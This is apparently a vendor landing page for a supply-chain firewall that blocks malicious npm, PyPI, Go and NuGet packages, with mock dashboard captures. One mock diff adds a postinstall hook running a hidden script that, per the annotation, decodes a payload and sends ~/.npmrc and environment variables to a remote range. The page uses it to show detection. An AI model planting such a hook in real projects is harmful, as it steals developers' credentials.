Book a demo →
World's first · install-time firewall

Stop malicious packages
at the install, not the audit.

The CyberXYZ Platform is the world's first install-time supply-chain firewall. A registry proxy intercepts every install, a decision brain reads the code at the commit level, and one dashboard governs inventory, SBOMs and integrations, across laptops, CI/CD and Kubernetes.

Book a 15-min demo See commit-level detection ↓
ENFORCING 4/4 registries
npm ONLINE Python ONLINE Go ONLINE NuGet ONLINE
xyz-npm-proxy ● live
npm install axios@1.14.1 403 BLOCK
pip install requests==2.32.0 200 ALLOW
npm install left-pad@1.3.0 451 QUAR
dotnet add package Newtonsoft.Json 200 ALLOW
tarball scan · commit-level analysis · ~80 ms median

fig. 01 · live registry proxy (the firewall)

GitHub GitLab Azure DevOps JavaScript / npm Python / PyPI Go .NET / NuGet Java
The firewall

A verdict on every install,
before it touches disk.

CyberXYZ sits in front of registry.npmjs.org, pypi.org and the rest. Every request is intercepted, the tarball is buffered and scanned, and the proxy returns allow, alert, quarantine or block, in milliseconds. Cluster-wide enforcement, zero developer friction.

app.cyberxyz.io/proxy/findings
Search package, IP, OS… All types All risk levels live
May 28, 10:40 AM npm flatmap-stream@0.1.1 BLOCKED gha/CyberXYZ CI/CD Linux 172.184.213.226 CRITICAL
BLOCKED[known_malicious_version]Confirmed supply-chain attack: credential_stealer. Safe versions: 0.1.0CRITICAL
BLOCKED[vulnerability_match]GHSA-9x64-5r7x-2q53 · ranges ['= 0.1.1'] · fixed: noneCRITICAL
BLOCKED[vulnerability_match]GHSA-mh6f-8j2x-4483 · ranges ['>= 0'] · fixed: noneCRITICAL
May 26, 09:22 AM npm axios@1.14.1 BLOCKED Mike’s MacBook DEV macOS 169.254.169.126 CRITICAL
BLOCKED[known_malicious_version]Confirmed supply-chain attack: RAT Dropper via compromised maintainer. Safe versions: 1.7.7, 1.7.6, 1.7.5CRITICAL
ALERT[vulnerability_match]GHSA-q8qp-cvcw-x6jj · ranges ['>=1.0.0', '<1.15.2'] · fixed: noneHIGH
QUARANTINE[version_jump_anomaly]axios jumped from 1.10.0 to 1.14.1 (skipped 4 minor versions overnight)MEDIUM
May 22, 12:15 PMnpmleft-pad@1.3.1BLOCKEDgitlab/cyber CI/CD Linux34.139.136.251CRITICAL
May 22, 12:15 PMGogo-weather-sdk@v0.4.0BLOCKEDgitlab/cyber CI/CD Linux34.139.136.251CRITICAL
May 22, 12:15 PMNuGetAeroWizard.Net@2.3.1BLOCKEDgitlab/cyber CI/CD Linux34.139.136.251CRITICAL
May 22, 12:15 PMPyPIdurabletask@1.4.1QUARANTINEgitlab/cyber CI/CD Linux34.139.136.251MEDIUM

fig. 02 · proxy findings (live capture from app.cyberxyz.io)

Commit-level detection

We read the code,
not just the scorecard.

Most "supply-chain" tools rate a package on project-health signals (OSSF scorecards). CyberXYZ does that and reads the actual change, line by line, commit by commit, so a malicious postinstall hook is caught the moment it lands, with no CVE required.

// across your repos GitHub GitLab
a3f9c2e chore: tidy build scripts 2 days ago
package.json
31 "scripts": {
32- "build": "tsc"
32+ "build": "tsc",
33+ "postinstall": "node ./.cache/setup.js"
XYZLifecycle hook added in a "tidy" commit. setup.js base64-decodes a payload and POSTs ~/.npmrc + env to 45.32.0.0/16. Verdict: BLOCK, no CVE required.
34 }

fig. 03 · commit-level verdict (built mock)

git

Diff-aware

Every commit is parsed: added lifecycle hooks, network calls, obfuscation and file writes are scored, not just the manifest.

CVE

No CVE required

Day-zero malware is caught on behavior and intent, before any advisory exists.

OSSF

Beyond OSSF scorecards

Proxy / repository managers stop at project-health signals. We add the actual code change on top.

MITRE ATT&CK

MITRE ATT&CK tagged

Findings map to techniques, so your SOC sees them in language it already speaks.

The decision brain

Every surface asks
the same brain.

Editor, CLI, CI/CD and the runtime proxy all route to one decision engine, four signals, one verdict in ~80 ms. See the full methodology →

One dashboard

Machines, installs and verdicts,
in one place.

app.cyberxyz.io/fleet
Search name, IP, OS… All types All risk levels
Dev Machine 1 at risk
Mike’s MacBook Air0 blocked
Dev MachineDarwin169.254.169.126
0 installs · 34 scans
SSLProxyview details →
CI / CD 9 at risk
gha/CyberXYZSecurity/cyb…clean
CVSSLinux
31.146.211.20 · 32 installs
Proxyview details →
gha/CyberXYZSecurity/cyb…clean
CVSSLinux
128.66.193.5 · 32 installs
Proxyview details →
gha/CyberXYZSecurity/cyb…0 blocked
CVSSLinux
171.194.112.9 · 34 installs
Proxyview details →
gha/CyberXYZSecurity/cyb…clean
CVSSLinux
97.104.221.7 · 32 installs
Proxyview details →
gha/CyberXYZSecurity/cyb…clean
CVSSLinux
38.61.175.230 · 32 installs
Proxyview details →
gha/CyberXYZSecurity/cyb…clean
CVSSLinux
115.211.133.20 · 32 installs
Proxyview details →
cyberxyz-security/jdi…0 blocked
CVSSLinux
203.168.198.6 · 78 installs
Proxyview details →
ado/cyberxyz-test/age…0 blocked
CVSSLinux
38.226.207.101 · 3 installs
Proxyview details →

fig. 04 · fleet overview (every machine, one place)

app.cyberxyz.io/notifications/15835
notification #15835 May 28 · 11d ago

Blocked install: axios@1.14.1 on gha/CyberXYZSecurity/cyberxyz-platform · GitHub Actions 1000000333

0/10
RISK SCORE critical · verdict block
SIGNALS
FLEET IMPACT 0 of 3 machines · 0%
gha/CyberXYZSecurity/cyberxyz-platform · GHA 1000000333 Mike’s MacBook Air docker-container
STATEMENT Ecosystem npm · decision block (confidence 1.0) · machine gha/CyberXYZSecurity/cyberxyz-platform · suggested safe version 1.7.7
SIGNALS · 4 of 4 fired
01Script & Tarball ScantriggeredCRITICAL

Obfuscated postinstall hook base64-decodes a payload and POSTs ~/.npmrc + env to 45.32.0.0/16.

02Commit-Level AnalysistriggeredCRITICAL

Maintainer commit a3f9c2e injected a credential-exfil routine in a “tidy build” change. No CVE filed.

03Centrality & Blast RadiuselevatedHIGH

113.2M weekly installs, present on 3 of 3 machines. Top 0.1% blast radius across the dependency graph.

04Live Threat IntelmatchedCRITICAL

Matches active campaign: RAT Dropper via compromised maintainer. First seen 2026-05-26, 11 orgs hit.

PACKAGE CONTEXT
version 1.14.1 · published Mar 30 · 0 weekly downloads · 1 maintainer · github.com/axios/axios · MIT
PACKAGE axios VERSION 1.14.1 ECOSYSTEM npm DECISION BLOCK

fig. 05 · install verdict (XYZ score, live capture)

Integrations

Plugs into the tools
your SOC already runs.

Native connectors for SIEMs, CI/CD, IDEs and orchestration. Every verdict and IOC, delivered where your team already works.

GitHubGitHub
GitHub ActionsGitHub Actions
GitLab CIGitLab CI
Azure DevOpsAzure DevOps
MicrosoftMicrosoft
JenkinsJenkins
IBM QRadarIBM QRadar
SplunkSplunk
SentinelOneSentinelOne
CrowdStrikeCrowdStrike
ElasticElastic SIEM
KubernetesKubernetes
DockerDocker
WebhooksWebhooks
GitHubGitHub
GitHub ActionsGitHub Actions
GitLab CIGitLab CI
Azure DevOpsAzure DevOps
MicrosoftMicrosoft
JenkinsJenkins
IBM QRadarIBM QRadar
SplunkSplunk
SentinelOneSentinelOne
CrowdStrikeCrowdStrike
ElasticElastic SIEM
KubernetesKubernetes
DockerDocker
WebhooksWebhooks
// the ask

See the firewall
block a live attack.

Get a 15-minute walkthrough of the proxy, the commit-level brain and the dashboard. We'll plug it into your CI in under an hour.

  • Live proxy demo
  • Free proof-of-concept
  • CI integration in < 1 hour

Thanks! We'll be in touch.

Check your inbox. We'll reach out within 24 hours.

Get a demo

We'll respond within 24 hours. No spam, ever.